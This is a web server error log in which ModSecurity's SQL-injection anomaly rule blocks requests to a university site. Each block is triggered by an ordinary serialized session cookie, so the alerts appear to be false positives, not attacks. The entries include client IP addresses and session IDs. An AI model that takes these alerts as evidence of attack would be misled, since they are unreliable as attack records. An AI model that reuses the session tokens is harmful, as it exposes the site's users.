[Mon Aug 28 23:57:23.369432 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOzR88Co-f0AANpfcYMAAAAF"]
[Mon Aug 28 23:57:23.418179 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/buttons/li2.gif"] [unique_id "ZOzR88Co-f0AANpfcYQAAAAF"]
[Mon Aug 28 23:57:23.748403 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOzR88Co-f0AANpfcYUAAAAF"]
[Mon Aug 28 23:57:37.663096 2023] [:error] [pid 55903] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOzSAcCo-f0AANpfcYcAAAAF"]
[Mon Aug 28 23:57:37.666371 2023] [:error] [pid 55794] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOzSAcCo-f0AANny2WEAAAAO"]
[Mon Aug 28 23:57:37.909222 2023] [:error] [pid 55749] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOzSAcCo-f0AANnF9bAAAAAE"]
[Mon Aug 28 23:57:37.909471 2023] [:error] [pid 55910] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOzSAcCo-f0AANpm5qYAAAAX"]
[Mon Aug 28 23:57:37.919977 2023] [:error] [pid 55794] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOzSAcCo-f0AANny2WIAAAAO"]
[Mon Aug 28 23:57:37.922569 2023] [:error] [pid 55916] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOzSAcCo-f0AANpsPIMAAAAf"]
[Mon Aug 28 23:57:37.924539 2023] [:error] [pid 55903] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOzSAcCo-f0AANpfcYgAAAAF"]
[Mon Aug 28 23:57:37.930089 2023] [:error] [pid 55912] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOzSAcCo-f0AANpo-78AAAAb"]
[Mon Aug 28 23:57:38.158647 2023] [:error] [pid 55910] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOzSAsCo-f0AANpm5qcAAAAX"]
[Mon Aug 28 23:57:38.161119 2023] [:error] [pid 55749] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOzSAsCo-f0AANnF9bEAAAAE"]
[Mon Aug 28 23:57:38.174572 2023] [:error] [pid 55794] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOzSAsCo-f0AANny2WMAAAAO"]
[Mon Aug 28 23:57:38.176451 2023] [:error] [pid 55916] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOzSAsCo-f0AANpsPIQAAAAf"]
[Mon Aug 28 23:57:38.185509 2023] [:error] [pid 55903] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOzSAsCo-f0AANpfcYkAAAAF"]
[Mon Aug 28 23:57:38.192562 2023] [:error] [pid 55912] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOzSAsCo-f0AANpo-8AAAAAb"]
[Mon Aug 28 23:57:38.406512 2023] [:error] [pid 55910] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOzSAsCo-f0AANpm5qgAAAAX"]
[Mon Aug 28 23:57:38.411809 2023] [:error] [pid 55749] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOzSAsCo-f0AANnF9bIAAAAE"]
